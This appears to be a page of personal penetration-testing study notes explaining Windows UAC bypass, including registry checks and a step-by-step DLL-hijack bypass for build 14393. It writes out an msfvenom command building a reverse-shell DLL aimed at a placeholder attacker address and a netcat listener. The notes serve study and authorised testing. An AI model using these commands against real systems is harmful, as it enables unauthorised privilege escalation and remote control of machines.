Pentest Notes
  • 🏠/home/x3m1Sec/.pt-notes
  • πŸ“Pentest Notes
    • πŸ”Information Gathering
    • πŸ“œProtocols and Services
      • DNS
      • FTP
      • IMAP
      • IPMI
      • MSSQL
      • MySQL
      • NFS
      • Oracle TNS
      • POP3
      • RDP
      • SMB
      • SMTP
      • SNMP
    • πŸ•ΈοΈWeb Applications
      • Web Attacks
        • Cross Site Scripting (XSS)
        • SQL Injection (SQLi)
        • File Upload Vulnerabilities
        • Insecure Direct Object References (IDOR)
        • OS Command Injection
        • Local File Inclusion (LFI)
        • Remote File Inclusion (RFI)
        • XML External Entities (XXE)
        • HTTP Verb Tampering
      • Web Technologies
        • Tomcat
        • CGI Applications
        • WordPress
        • SAP Netweaver
        • Joomla
        • Drupal
        • Gitlab
        • Jenkins
        • Microsoft IIS
        • osTicket
        • PRTG Network Monitor
        • Splunk
      • Fuzzing
    • πŸ“‚Active Directory
      • Initial Access
      • Internal Enumeration & Lateral Movement
      • Privilege Escalation to Domain Admin using Known Exploits
      • Domain Trusts
    • 🐧Linux Privilege Escalation
      • Enumerating Attack Vectors
      • Privileged Groups
      • Environment Variables Abuse
      • Capabilities Abuse
      • Programs, Jobs and Services
      • Miscellaneous Techniques
      • Recent CVEs
    • πŸͺŸWindows Privilege Escalation
      • Enumerating Attack Vectors
      • Excessive User Rights Abuse
      • Built-in Groups Abuse
      • File System ACLs
      • Services Hijacking
      • User Account Control (UAC) Bypass
      • Living off the Land
    • πŸ›Bug Bounty Hunting
      • Bug Bounty Tools
    • πŸ‘ΎUtilities, Scripts and Payloads
      • Shells and Payloads
      • Metasploit Framework
      • File Transfers
      • Pivoting, Tunneling, Port Forwarding
      • Password Attacks
  • πŸŽ“My Certifications
    • eJPTv2
      • My review
    • CPTS
      • CheatSheet
Powered by GitBook
On this page
  • Initial Enumeration
  • Example - UAC Bypass in Windows Build 14393
  1. Pentest Notes
  2. Windows Privilege Escalation

User Account Control (UAC) Bypass

PreviousServices HijackingNextLiving off the Land

Last updated 13 days ago

UAC bypasses leverage flaws or unintended functionality in different Windows builds.

The following repository contains many different UAC Bypassing Techniques:

Initial Enumeration

Check if UAC is enabled (0x1=true): REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

Check the UAC level(0x5=max level): REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

To check the Windows Build: [environment]::OSVersion.Version

Check repository and see if anything exists for the target build number

Example - UAC Bypass in Windows Build 14393

  1. We can basically bypass UAC by placing a malicious srrstr.dll DLL to the WindowsApps folder, which will be loaded in an elevated context

  2. Generate malicious DLL file: msfvenom -p windows/shell_reverse_tcp LHOST=our-ip LPORT=listening-port -f dll > srrstr.dll

  3. Transfer the DLL on the target machine

  4. Start a netcat listener on the attacker machine: nc -lvnp 4444

  5. Get a reverse shell: C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe

πŸ“
πŸͺŸ
https://github.com/hfiref0x/UACME
this